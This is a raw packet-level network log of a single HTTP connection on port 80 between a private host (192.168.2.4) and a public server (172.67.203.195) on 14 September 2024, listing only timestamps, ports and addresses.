Sep 14, 2024 18:31:11.181607962 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.181624889 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.181633949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.181643009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.181653023 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.181657076 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.181664944 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.181812048 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.181812048 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.209187984 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.209213018 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.209224939 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.209234953 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.209247112 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.209258080 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.209269047 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.209405899 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.209405899 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.253319979 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.253339052 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.253350019 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.253410101 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.253421068 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.253432035 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.253508091 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.253515959 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.253515959 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.253520012 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.253532887 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.253546953 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.253547907 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.253571033 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.253608942 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.253609896 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.253621101 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.253633022 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.253644943 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.253683090 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.253722906 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.254425049 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.254445076 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.254458904 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.254496098 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.254514933 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.254527092 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.254538059 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.254549980 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.254570961 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.254602909 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.256262064 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.256279945 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.256292105 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.256303072 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.256314993 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.256315947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.256329060 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.256340027 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.256349087 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.256350994 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.256366014 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.256395102 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.256412983 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.256417036 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.256424904 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.256453991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.256464005 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.256464958 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.256530046 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.256570101 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.256582022 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.256592035 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.256625891 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.257606983 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.257616043 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.257661104 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.257675886 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.257687092 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.257698059 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.257708073 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.257724047 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.257729053 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.257733107 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.257754087 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.257766962 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.257774115 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.257778883 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.257817030 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.257822037 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.257833958 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.257873058 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.257922888 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.257932901 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.257944107 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.257952929 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.257961988 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.257973909 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.258012056 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.258013010 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.258027077 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.258038044 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.258048058 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.258068085 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.258078098 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.258080006 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.258088112 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.258135080 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.258135080 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.258158922 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.258171082 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.258179903 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.258191109 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.258200884 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.258219957 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.258254051 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.258316040 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.258327007 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.258337021 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.258347034 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.258356094 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.258372068 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.258407116 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.258459091 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.258470058 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.258480072 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.258490086 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.258500099 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.258511066 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.258517981 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.258522987 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.258533001 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.258539915 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.258574009 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.258574009 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.258860111 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.258869886 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.258879900 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.258898020 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.258908987 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.258914948 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.258919954 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.258949041 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.258953094 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.258960962 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.258980036 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.259013891 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.259114027 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.259124994 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.259134054 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.259167910 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.259203911 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.259215117 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.259224892 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.259263992 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.259299994 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.259372950 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.259390116 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.259399891 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.259438992 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.259460926 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.259471893 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.259481907 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.259491920 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.259504080 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.259515047 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.259553909 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.259553909 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.259593964 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.259604931 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.259620905 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.259634972 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.259646893 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.259646893 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.259660959 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.259671926 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.259680986 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.259691954 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.259706020 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.259744883 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.268529892 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.268551111 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.268562078 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.268598080 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.268640041 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.268651009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.268662930 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.268673897 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.268685102 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.268721104 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.268754959 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.301002979 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.301019907 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.301031113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.301040888 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.301052094 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.301062107 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.301079035 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.301265955 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.301265955 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.341686010 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.341696978 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.341706991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.341870070 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.341984034 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.341999054 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.342009068 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.342017889 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.342027903 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.342160940 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.342160940 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.342405081 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.342416048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.342426062 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.342560053 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.342569113 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.342569113 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.342570066 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.342628956 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.342709064 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.342719078 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.342727900 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.342772007 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.342863083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.342873096 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.342880964 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.342921019 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.342957973 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.343015909 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.343024969 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.343034983 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.343043089 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.343051910 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.343066931 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.343101025 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.344202042 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.344218016 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.344229937 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.344259977 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.344295979 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.344350100 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.344362020 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.344372034 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.344383001 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.344393969 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.344403982 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.344408989 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.344415903 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.344427109 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.344429970 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.344436884 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.344449043 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.344454050 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.344460964 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.344471931 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.344486952 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.344511032 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.344542027 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.344631910 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.344644070 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.344654083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.344687939 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.344721079 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.344732046 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.344743013 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.344758034 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.344773054 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.344804049 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.344866991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.344877958 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.344888926 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.344898939 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.344907999 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.344923019 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.344923973 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.344955921 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.344996929 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.345007896 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.345017910 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.345027924 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.345036983 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.345046997 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.345050097 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.345094919 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.345133066 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.345144033 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.345154047 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.345163107 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.345189095 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.345223904 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.345243931 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.345256090 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.345264912 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.345273972 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.345283985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.345298052 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.345299006 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.345314026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.345321894 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.345335007 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.345374107 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.345381975 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.345386028 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.345403910 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.345413923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.345426083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.345427990 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.345438004 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.345448971 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.345468998 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.345504045 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.345504999 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.345889091 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.345901012 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.345911026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.345943928 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.346019983 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.346030951 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.346041918 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.346050978 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.346060991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.346076012 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.346110106 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.346143961 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.346165895 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.346174955 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.346184015 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.346209049 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.346219063 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.346220970 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.346230030 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.346259117 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.346260071 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.346270084 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.346282005 CEST	49738	80	192.168.2.4	172.67.203.195
